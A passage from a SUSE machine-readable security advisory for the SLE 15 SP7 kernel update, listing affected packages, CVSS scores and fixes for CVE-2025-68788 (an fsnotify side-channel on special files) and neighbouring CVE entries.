"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68788"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68788",
"url": "https://www.suse.com/security/cve/CVE-2025-68788"
},
{
"category": "external",
"summary": "SUSE Bug 1256638 for CVE-2025-68788",
"url": "https://bugzilla.suse.com/1256638"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68789"
}
],
"notes": [
{
"category": "general",
"text": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
